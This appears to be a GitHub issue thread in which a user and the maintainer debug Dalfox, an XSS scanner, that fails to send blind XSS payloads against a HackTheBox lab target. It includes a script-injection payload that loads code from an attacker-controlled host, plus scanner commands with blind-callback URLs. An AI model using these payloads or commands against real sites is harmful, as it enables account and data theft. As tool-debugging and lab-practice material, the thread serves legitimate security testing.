Dalfox Not Testing Blind XSS

[tekcap]

Running a very basic Blind XSS command against a hackthebox target and it doesn't look like Dalfox is even using the blind payload.

dalfox url "http://IP/hijacking/index.php?fullname=x&username=x&password=x&email=dsfs%40joe.com&imgurl=a" -b http://IP:8080 --skip-bav --debug --skip-mining-all -p imgurl -w 1

The imgurl parameter is vulnerable to this XSS payload: "><script src=http://IP:8080></script>

I'm assuming Dalfox will use that payload since it's a very basic one.

The debug shows this, but I'm not sure what it means:

 [88/143 Queries][61.54%] Testing "imgurl" param and waiting headlessSep 26 04:12:45.894 [DEBU] [toBlind] [vds] false
Sep 26 04:12:45.894 [DEBU] [toBlind] [vrs] false

Does the false mean that it's not attempting the blind payloads? All the other debug lines are showing me the payload that it is currently testing, but when the blind debug lines appears, it's empty, as shown above. I proxy everything through BURP and can confirm that it's not sending the blind payload.

[hahwul]

Hi @tekcap

What is the version of dalfox? First of all, the blind XSS payload is being sent well in my env.
I need to know the exact situation, so please check it!
(blind XSS is sent in various patterns in various sections such as parameters and headers.)

dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 -b hahwul.xss.ht --proxy http://localhost:8090

[hahwul]

Oh, there's one thing I found out. Based on the current pkg, parameters other than reflected are not testing blind xss. I think this was the problem, let me check quickly!

[tekcap]

I'm on version v2.8.1 installed with go command provided.

For some reason, the blind XSS doesn't even get sent in the url parameter. I don't see the payload anywhere in BURP

[hahwul]

@tekcap
There was a bug in the parameter analysis and I just fixed it. Please update to v2.8.2 and check it! If it is reproduced in v2.8.2, please re-open it. Thank you very much :D

How to update DalFox

Test

Param Analysis (test with --report flag)

Old

New

Blind XSS Test

./dalfox version
# v2.8.2

./dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 \
      -b hahwul.xss.ht \
      --proxy http://localhost:8090

[tekcap]

I just realized this issue still persists when using "file --rawdata" with a post request.

I think you fixed it for GET, but not POST.

I see the Referrer header is working with the blind payload, but not the parameters

[hahwul]

@tekcap
Thank you for the report! Let me check again :D

• Blind Payload Not Working in POST #416

[anasbousselham]

Blind Payload Not Working in POST